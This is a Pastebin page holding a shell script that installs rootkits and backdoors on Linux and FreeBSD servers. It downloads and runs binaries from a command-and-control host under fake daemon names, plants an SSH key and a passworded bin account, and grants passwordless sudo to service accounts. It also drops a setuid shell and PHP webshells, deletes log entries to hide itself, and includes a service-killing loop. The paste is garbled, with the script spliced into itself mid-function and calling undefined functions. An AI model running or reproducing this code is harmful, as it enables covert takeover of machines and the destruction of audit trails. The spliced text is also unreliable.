API tools faq
paste
Advertisement
Guest User

Rooting Ubuntu, Centos, Debian, FreeBSD in seconds

a guest
Apr 8th, 2015
498
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 15.69 KB | None | 0 0
raw download clone embed print report
  1. #!/bin/sh
  2. # cmc / sapling
  3. # installs rootkit & backdoors on debian/centos/pfsense bsd boxes
  4.  
  5. # root ssh key
  6. SHARED_PUBKEY="ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDKcAi3VkTNZOQsLiiPvE8gyThrLzD2w8g1aN4VArx8ksOfVteVRfDtjWVLgLpdbySjaIBXn4WeViqxf1TZ8fq5loN4tcHnFOvtBs30JQ1JktwXqwvZaHomqZGJeP0IHLK9rYsJZnHbyk4u2qgs/vpM3wkhX86ywpDzTo+xTEV+XPuCBP+e7QIDuBM20rXkHEroIssYDjSus9o3issH/u+iguGulJaW534mZ9YiC6ELoDKLpQ0wCgwEjLfg04Tz6L6mKBjkyq86wb5iDo0+5zrY5XKOJB5BiBsvAULBnA3to203ZaGrJWQP1CdPbpOINHkTekoWJt5W40LSD41pE86z"
  7.  
  8. ### CHANGE ME ###
  9. # urls for webserver where kits/backdoor binaries are hosted
  10. # file names to grab
  11.  
  12. C2_URL="http://172.25.58.142/"
  13. C2_IP="172.25.58.142"
  14.  
  15. # fedora kit
  16. FEDORA_KIT="fedx32.bin"
  17. FEDORA64_KIT="fedx64.bin"
  18. UBUNTU64_KIT="ubux64.bin"
  19. UBUNTU_KIT="ubux32.bin"
  20. BSD_KIT="hole.bin"
  21. TRIXDOOR="trixd00rd-static-ubuntu"
  22. ROOTY="rooty-release.x86"
  23. ROOTYBSD="rootybsd.x64"
  24.  
  25. #################
  26.  
  27. ARCH=`uname -i`
  28.  
  29. do_backdoors() {
  30.         echo "removing utmp.."
  31.         rm -rf /var/run/utmp
  32.         touch /var/run/utmp
  33.         chmod 664 /var/run/utmp
  34.         echo "installing root ssh key!"
  35.         chattr -i /root/.ssh/authorized*
  36.         if [ ! -d "/root/.ssh" ]; then
  37.             mkdir /root/.ssh
  38.         fi
  39.         echo $SHARED_PUBKEY >> /root/.ssh/authorized_keys2
  40.         echo $SHARED_PUBKEY >> /root/.ssh/authorized_keys
  41.         # add secondary key auth file, for when they inevitably remove /root/.ssh/
  42.         echo $SHARED_PUBKEY >> /etc/ssh/authorized_keys
  43.         echo 'AuthorizedKeysFile /etc/ssh/authorized_keys' >> /etc/ssh/sshd_config
  44.         chattr +i /root/.ssh/authorized_keys*
  45.         echo "dropping trixd00r.."
  46.         if [ ! -d "/dev/..." ]; then
  47.             mkdir /dev/...
  48.         fi
  49.         cd /dev/...
  50.         wget -q $C2_URL$TRIXDOOR -O rsyslogd
  51.         chmod +x rsyslogd
  52.         env PATH=$PWD MANAGER=$C2_IP /usr/bin/nohup rsyslogd &
  53.         echo "dropping rooty.."
  54.         wget -q $C2_URL$ROOTY -O udevd
  55.         chmod +x udevd
  56.         env PATH=$PWD /usr/bin/nohup udevd &
  57.         # uncomment below to do iptables crontab shenanigans
  58.         # echo "adding 5m disable iptables crontab.."
  59.         # echo "*/5 * * * * /sbin/iptables -F" | crontab -
  60.         echo "backdoor bin account! pass=lol123"
  61.         sed -i -e 's/bin:\*:/bin:$6$OkgT6DOT$0fswsID8AwsBF35QHXQVmDLzYGT.pUtizYw2G9ZCe.o5pPk6HfdDazwdqFIE40muVqJ832z.p.6dATUDytSdV0:/g' /etc/shadow
  62.         usermod -s /bin/sh bin
  63.         echo 'bin ALL=(ALL:ALL) NOPASSWD:ALL' >> /etc/sudoers
  64.         echo 'www-data ALL=(ALL:ALL) NOPASSWD:ALL' >> /etc/sudoers
  65.         echo 'apache ALL=(ALL:ALL) NOPASSWD:ALL' >> /etc/sudoers
  66.         echo 'httpd ALL=(ALL:ALL) NOPASSWD:ALL' >> /etc/sudoers
  67.         groupadd admin
  68.         # take care of logs, ie 'groupadd[31001]: new group: name=admin, GID=1005' in auth.log
  69.         sed -ie "/groupadd/d" /var/log/auth.log /var/log/messages /var/log/secure
  70.         # ubuntu automatically makes members of admin have sudo capabilities.
  71.         # lets give that as an option for root to web backdoors
  72.         usermod -G admin -a bin
  73.         usermod -G admin -a www-data
  74.         usermod -G admin -a httpd
  75.         usermod -G admin -a apache
  76.         # take care of logs, ie 'usermod[31005]: add 'bin' to group 'admin'
  77.         sed -ie "/usermod/d" /var/log/auth.log /var/log/messages /var/log/secure
  78.         echo "setuid /bin/sh! for use with bin account"
  79.         if [ ! -d "/dev/  " ]; then
  80.             mkdir "/dev/  "
  81.         fi
  82.         cp /bin/sh "/dev/  /pwnd"
  83.         chmod 777 "/dev/  /pwnd"
  84.         chown root:root "/dev/  /pwnd"
  85.         chmod u+s "/dev/  /pwnd"
  86.         echo "clearing log entries with our IP.."
  87.         sed -ie "/$C2_IP/d" /var/log/auth.log /var/log/messages /var/log/secure
  88.         sed -ie "/passwd/d" /var/log/auth.log /var/log/messages /var/log/secure
  89.         sed -ie "/Accepted password for bin/d" /var/log/auth.log /var/log/messages /var/log/secure
  90.         sed -ie "/Accepted password for root/d" /var/log/auth.log /var/log/messages /var/log/secure
  91.         echo "dropping webshells.."
  92.         echo '<?php echo shell_exec($_GET['e']); ?>' > /var/www/.src.php
  93.         chmod 777 /var/www/.src.php
  94.         echo '<?php echo shell_exec($_GET['e']); ?>' > /var/www/html/.src.php
  95.         chmod 777 /var/www/html/.src.php
  96. }
  97.  
  98. do_bsdbackdoors() {
  99.         # this was a quick hack for the pfsense firewalls
  100.         # uses netcat vs wget because wget isnt installed on pfsense
  101.         # by default
  102.         echo "installing root ssh key!"
  103.         if [ ! -d "/root/.ssh" ]; then
  104.             mkdir /root/.ssh
  105.         fi
  106.         echo $PUBKEY >> /root/.ssh/authorized_keys2
  107.         echo $PUBKEY >> /root/.ssh/authorized_keys
  108.         chattr +i /root/.ssh/authorized_keys*
  109.         echo "dropping rooty via netcat.."
  110.         # NOTE: must have listening netcat with 'cat rootybsd.bin|nc -l 1338' on c2 server.
  111.         if [ ! -d "/dev/  " ]; then
  112.             mkdir "/dev/  "
  113.         fi
  114.         cd "/dev/  "
  115.         nc $C2_IP 1338 > udevd
  116.         chmod +x udevd
  117.         env PATH=$PWD /usr/bin/nohup udevd &
  118.         echo "dropping webshells.."
  119.         echo '<?php echo shell_exec($_GET['e']); ?>' > /var/www/.src.php
  120.         chmod 777 /var/www/.src.php
  121.         echo '<?php echo shell_exec($_GET['e']); ?>' > /var/www/html/.src.php
  122.         chmod 777 /var/www/html/.src.php
  123. }
  124.  
  125.  
  126. do_centos_rootkit() {
  127.     echo "Retrieving Fedora x86 kit..."
  128.         if [ ! -d "/dev/..." ]; then
  129.             mkdir /dev/...
  130.         fi
  131.     cd /dev/...
  132.     wget -q $C2_URL$FEDORA_KIT
  133.     chmod +x `basename $FEDORA_KIT`
  134.     ./`basename $FEDORA_KIT`
  135. }
  136.  
  137. do_centos64_rootkit() {
  138.     echo "Retrieving Fedora x64 kit..."
  139.         if [ ! -d "/dev/..." ]; then
  140.             mkdir /dev/...
  141.         fi
  142.     cd /dev/...
  143.     wget -q $C2_URL$FEDORA64_KIT
  144.     chmod +x `basename $FEDORA64_KIT`
  145.     ./`basename $FEDORA64_KIT`
  146. }
  147.  
  148.  
  149. do_freebsd64_rootkit() {
  150.     echo "Installing BSD hole.bin.."
  151.     cd /opt/
  152.     # cmc: pfSense / BSD has no wget/curl
  153.     # make sure we have a listening netcat#!/bin/sh
  154. # cmc / sapling
  155. # installs rootkit & backdoors on debian/centos/pfsense bsd boxes
  156.  
  157. # root ssh key
  158. SHARED_PUBKEY="ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDKcAi3VkTNZOQsLiiPvE8gyThrLzD2w8g1aN4VArx8ksOfVteVRfDtjWVLgLpdbySjaIBXn4WeViqxf1TZ8fq5loN4tcHnFOvtBs30JQ1JktwXqwvZaHomqZGJeP0IHLK9rYsJZnHbyk4u2qgs/vpM3wkhX86ywpDzTo+xTEV+XPuCBP+e7QIDuBM20rXkHEroIssYDjSus9o3issH/u+iguGulJaW534mZ9YiC6ELoDKLpQ0wCgwEjLfg04Tz6L6mKBjkyq86wb5iDo0+5zrY5XKOJB5BiBsvAULBnA3to203ZaGrJWQP1CdPbpOINHkTekoWJt5W40LSD41pE86z"
  159.  
  160. ### CHANGE ME ###
  161. # urls for webserver where kits/backdoor binaries are hosted
  162. # file names to grab
  163.  
  164. C2_URL="http://172.25.58.142/"
  165. C2_IP="172.25.58.142"
  166.  
  167. # fedora kit
  168. FEDORA_KIT="fedx32.bin"
  169. FEDORA64_KIT="fedx64.bin"
  170. UBUNTU64_KIT="ubux64.bin"
  171. UBUNTU_KIT="ubux32.bin"
  172. BSD_KIT="hole.bin"
  173. TRIXDOOR="trixd00rd-static-ubuntu"
  174. ROOTY="rooty-release.x86"
  175. ROOTYBSD="rootybsd.x64"
  176.  
  177. #################
  178.  
  179. ARCH=`uname -i`
  180.  
  181. do_backdoors() {
  182.         echo "removing utmp.."
  183.         rm -rf /var/run/utmp
  184.         touch /var/run/utmp
  185.         chmod 664 /var/run/utmp
  186.         echo "installing root ssh key!"
  187.         chattr -i /root/.ssh/authorized*
  188.         if [ ! -d "/root/.ssh" ]; then
  189.             mkdir /root/.ssh
  190.         fi
  191.         echo $SHARED_PUBKEY >> /root/.ssh/authorized_keys2
  192.         echo $SHARED_PUBKEY >> /root/.ssh/authorized_keys
  193.         # add secondary key auth file, for when they inevitably remove /root/.ssh/
  194.         echo $SHARED_PUBKEY >> /etc/ssh/authorized_keys
  195.         echo 'AuthorizedKeysFile /etc/ssh/authorized_keys' >> /etc/ssh/sshd_config
  196.         chattr +i /root/.ssh/authorized_keys*
  197.         echo "dropping trixd00r.."
  198.         if [ ! -d "/dev/..." ]; then
  199.             mkdir /dev/...
  200.         fi
  201.         cd /dev/...
  202.         wget -q $C2_URL$TRIXDOOR -O rsyslogd
  203.         chmod +x rsyslogd
  204.         env PATH=$PWD MANAGER=$C2_IP /usr/bin/nohup rsyslogd &
  205.         echo "dropping rooty.."
  206.         wget -q $C2_URL$ROOTY -O udevd
  207.         chmod +x udevd
  208.         env PATH=$PWD /usr/bin/nohup udevd &
  209.         # uncomment below to do iptables crontab shenanigans
  210.         # echo "adding 5m disable iptables crontab.."
  211.         # echo "*/5 * * * * /sbin/iptables -F" | crontab -
  212.         echo "backdoor bin account! pass=lol123"
  213.         sed -i -e 's/bin:\*:/bin:$6$OkgT6DOT$0fswsID8AwsBF35QHXQVmDLzYGT.pUtizYw2G9ZCe.o5pPk6HfdDazwdqFIE40muVqJ832z.p.6dATUDytSdV0:/g' /etc/shadow
  214.         usermod -s /bin/sh bin
  215.         echo 'bin ALL=(ALL:ALL) NOPASSWD:ALL' >> /etc/sudoers
  216.         echo 'www-data ALL=(ALL:ALL) NOPASSWD:ALL' >> /etc/sudoers
  217.         echo 'apache ALL=(ALL:ALL) NOPASSWD:ALL' >> /etc/sudoers
  218.         echo 'httpd ALL=(ALL:ALL) NOPASSWD:ALL' >> /etc/sudoers
  219.         groupadd admin
  220.         # take care of logs, ie 'groupadd[31001]: new group: name=admin, GID=1005' in auth.log
  221.         sed -ie "/groupadd/d" /var/log/auth.log /var/log/messages /var/log/secure
  222.         # ubuntu automatically makes members of admin have sudo capabilities.
  223.         # lets give that as an option for root to web backdoors
  224.         usermod -G admin -a bin
  225.         usermod -G admin -a www-data
  226.         usermod -G admin -a httpd
  227.         usermod -G admin -a apache
  228.         # take care of logs, ie 'usermod[31005]: add 'bin' to group 'admin'
  229.         sed -ie "/usermod/d" /var/log/auth.log /var/log/messages /var/log/secure
  230.         echo "setuid /bin/sh! for use with bin account"
  231.         if [ ! -d "/dev/  " ]; then
  232.             mkdir "/dev/  "
  233.         fi
  234.         cp /bin/sh "/dev/  /pwnd"
  235.         chmod 777 "/dev/  /pwnd"
  236.         chown root:root "/dev/  /pwnd"
  237.         chmod u+s "/dev/  /pwnd"
  238.         echo "clearing log entries with our IP.."
  239.         sed -ie "/$C2_IP/d" /var/log/auth.log /var/log/messages /var/log/secure
  240.         sed -ie "/passwd/d" /var/log/auth.log /var/log/messages /var/log/secure
  241.         sed -ie "/Accepted password for bin/d" /var/log/auth.log /var/log/messages /var/log/secure
  242.         sed -ie "/Accepted password for root/d" /var/log/auth.log /var/log/messages /var/log/secure
  243.         echo "dropping webshells.."
  244.         echo '<?php echo shell_exec($_GET['e']); ?>' > /var/www/.src.php
  245.         chmod 777 /var/www/.src.php
  246.         echo '<?php echo shell_exec($_GET['e']); ?>' > /var/www/html/.src.php
  247.         chmod 777 /var/www/html/.src.php
  248. }
  249.  
  250. do_bsdbackdoors() {
  251.         # this was a quick hack for the pfsense firewalls
  252.         # uses netcat vs wget because wget isnt installed on pfsense
  253.         # by default
  254.         echo "installing root ssh key!"
  255.         if [ ! -d "/root/.ssh" ]; then
  256.             mkdir /root/.ssh
  257.         fi
  258.         echo $PUBKEY >> /root/.ssh/authorized_keys2
  259.         echo $PUBKEY >> /root/.ssh/authorized_keys
  260.         chattr +i /root/.ssh/authorized_keys*
  261.         echo "dropping rooty via netcat.."
  262.         # NOTE: must have listening netcat with 'cat rootybsd.bin|nc -l 1338' on c2 server.
  263.         if [ ! -d "/dev/  " ]; then
  264.             mkdir "/dev/  "
  265.         fi
  266.         cd "/dev/  "
  267.         nc $C2_IP 1338 > udevd
  268.         chmod +x udevd
  269.         env PATH=$PWD /usr/bin/nohup udevd &
  270.         echo "dropping webshells.."
  271.         echo '<?php echo shell_exec($_GET['e']); ?>' > /var/www/.src.php
  272.         chmod 777 /var/www/.src.php
  273.         echo '<?php echo shell_exec($_GET['e']); ?>' > /var/www/html/.src.php
  274.         chmod 777 /var/www/html/.src.php
  275. }
  276.  
  277.  
  278. do_centos_rootkit() {
  279.     echo "Retrieving Fedora x86 kit..."
  280.         if [ ! -d "/dev/..." ]; then
  281.             mkdir /dev/...
  282.         fi
  283.     cd /dev/...
  284.     wget -q $C2_URL$FEDORA_KIT
  285.     chmod +x `basename $FEDORA_KIT`
  286.     ./`basename $FEDORA_KIT`
  287. }
  288.  
  289. do_centos64_rootkit() {
  290.     echo "Retrieving Fedora x64 kit..."
  291.         if [ ! -d "/dev/..." ]; then
  292.             mkdir /dev/...
  293.         fi
  294.     cd /dev/...
  295.     wget -q $C2_URL$FEDORA64_KIT
  296.     chmod +x `basename $FEDORA64_KIT`
  297.     ./`basename $FEDORA64_KIT`
  298. }
  299.  
  300.  
  301. do_freebsd64_rootkit() {
  302.     echo "Installing BSD hole.bin.."
  303.     cd /opt/
  304.     # cmc: pfSense / BSD has no wget/curl
  305.     # make sure we have a listening netcat
  306.     # cat backdoor.bin | nc -v -l 13337
  307.     nc $C2_URL 1337 > /opt/scorebotd
  308.     # chmod 0755 `basename $BSD_KIT`
  309.     # mv `basename $BSD_KIT` /opt/scorebotd
  310.     chmod +x /opt/scorebotd
  311.     nohup /opt/scorebotd &
  312. }
  313. do_ubuntu_rootkit() {
  314.     echo "Retrieving ubuntu x86 kit..."
  315.         if [ ! -d "/dev/..." ]; then
  316.             mkdir /dev/...
  317.         fi
  318.     cd /dev/...
  319.     wget -q $C2_URL$UBUNTU_KIT
  320.     chmod +x `basename $UBUNTU_KIT`
  321.     ./`basename $UBUNTU_KIT`
  322. }
  323.  
  324.  
  325. do_ubuntu64_rootkit() {
  326. echo "Retrieving ubuntu x64 kit..."
  327.     if [ ! -d "/dev/..." ]; then
  328.             mkdir /dev/...
  329.     fi
  330.     cd /dev/...
  331.     wget -q $C2_URL$UBUNTU64_KIT
  332.     chmod +x `basename $UBUNTU64_KIT`
  333.     ./`basename $UBUNTU64_KIT`
  334. }
  335.  
  336. goodbye_sla() {
  337.     cat <<EOF > /usr/share/service.sh
  338. #!/bin/bash
  339. #UMAD?
  340. while [ 0 ]
  341. do
  342.     service httpd stop
  343.     service postfix stop
  344.     service sendmail stop
  345.     service mysql stop
  346.     service webmin stop
  347.         service named stop
  348.         service bind stop
  349.     killall -9 webmin.pl
  350.     killall -9 apache2
  351.         killall -9 httpd
  352.         killall -9 named
  353.     killall -9 mysqld_safe
  354.     killall -9 mysqld
  355.         sleep 10
  356. done
  357. EOF
  358. chmod +x /usr/share/service.sh
  359. nohup /usr/share/service.sh >/dev/null 2>&1 &
  360. }
  361.  
  362. # 64bit fedora
  363. if [ $ARCH = "x86_64" ] && [ -f "/etc/redhat-release" ]; then
  364.     do_centos64_rootkit
  365.     do_backdoors
  366. fi
  367.  
  368. # 32bit fedora
  369. if [ $ARCH != "x86_64" ] && [ -f "/etc/redhat-release" ]; then
  370.     do_centos_rootkit
  371.     do_backdoors
  372.         #goodbye_sla
  373. fi
  374.  
  375.  
  376. # ubuntu/debian 64bit
  377. if [ $ARCH  = "x86_64" ] && [ -f "/etc/debian_version" ]; then
  378.     do_ubuntu64_rootkit
  379.     do_backdoors
  380.     #goodbye_sla
  381. fi
  382.  
  383. # ubuntu/debian 32bit (assumed if not 64, whatever)
  384. if [ $ARCH != "x86_64" ] && [ -f "/etc/debian_version" ]; then
  385.     do_ubuntu32_rootkit
  386.     do_backdoors
  387.     #goodbye_sla
  388. fi
  389.  
  390.  
  391. # freebsd
  392. if [ `uname`  = 'FreeBSD' ]; then
  393.     do_freebsd64_kit
  394.     do_bsdbackdoors    
  395. fi
  396.     # cat backdoor.bin | nc -v -l 13337
  397.     nc $C2_URL 1337 > /opt/scorebotd
  398.     # chmod 0755 `basename $BSD_KIT`
  399.     # mv `basename $BSD_KIT` /opt/scorebotd
  400.     chmod +x /opt/scorebotd
  401.     nohup /opt/scorebotd &
  402. }
  403. do_ubuntu_rootkit() {
  404.     echo "Retrieving ubuntu x86 kit..."
  405.         if [ ! -d "/dev/..." ]; then
  406.             mkdir /dev/...
  407.         fi
  408.     cd /dev/...
  409.     wget -q $C2_URL$UBUNTU_KIT
  410.     chmod +x `basename $UBUNTU_KIT`
  411.     ./`basename $UBUNTU_KIT`
  412. }
  413.  
  414.  
  415. do_ubuntu64_rootkit() {
  416. echo "Retrieving ubuntu x64 kit..."
  417.     if [ ! -d "/dev/..." ]; then
  418.             mkdir /dev/...
  419.     fi
  420.     cd /dev/...
  421.     wget -q $C2_URL$UBUNTU64_KIT
  422.     chmod +x `basename $UBUNTU64_KIT`
  423.     ./`basename $UBUNTU64_KIT`
  424. }
  425.  
  426. goodbye_sla() {
  427.     cat <<EOF > /usr/share/service.sh
  428. #!/bin/bash
  429. #UMAD?
  430. while [ 0 ]
  431. do
  432.     service httpd stop
  433.     service postfix stop
  434.     service sendmail stop
  435.     service mysql stop
  436.     service webmin stop
  437.         service named stop
  438.         service bind stop
  439.     killall -9 webmin.pl
  440.     killall -9 apache2
  441.         killall -9 httpd
  442.         killall -9 named
  443.     killall -9 mysqld_safe
  444.     killall -9 mysqld
  445.         sleep 10
  446. done
  447. EOF
  448. chmod +x /usr/share/service.sh
  449. nohup /usr/share/service.sh >/dev/null 2>&1 &
  450. }
  451.  
  452. # 64bit fedora
  453. if [ $ARCH = "x86_64" ] && [ -f "/etc/redhat-release" ]; then
  454.     do_centos64_rootkit
  455.     do_backdoors
  456. fi
  457.  
  458. # 32bit fedora
  459. if [ $ARCH != "x86_64" ] && [ -f "/etc/redhat-release" ]; then
  460.     do_centos_rootkit
  461.     do_backdoors
  462.         #goodbye_sla
  463. fi
  464.  
  465.  
  466. # ubuntu/debian 64bit
  467. if [ $ARCH  = "x86_64" ] && [ -f "/etc/debian_version" ]; then
  468.     do_ubuntu64_rootkit
  469.     do_backdoors
  470.     #goodbye_sla
  471. fi
  472.  
  473. # ubuntu/debian 32bit (assumed if not 64, whatever)
  474. if [ $ARCH != "x86_64" ] && [ -f "/etc/debian_version" ]; then
  475.     do_ubuntu32_rootkit
  476.     do_backdoors
  477.     #goodbye_sla
  478. fi
  479.  
  480.  
  481. # freebsd
  482. if [ `uname`  = 'FreeBSD' ]; then
  483.     do_freebsd64_kit
  484.     do_bsdbackdoors    
  485. fi
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!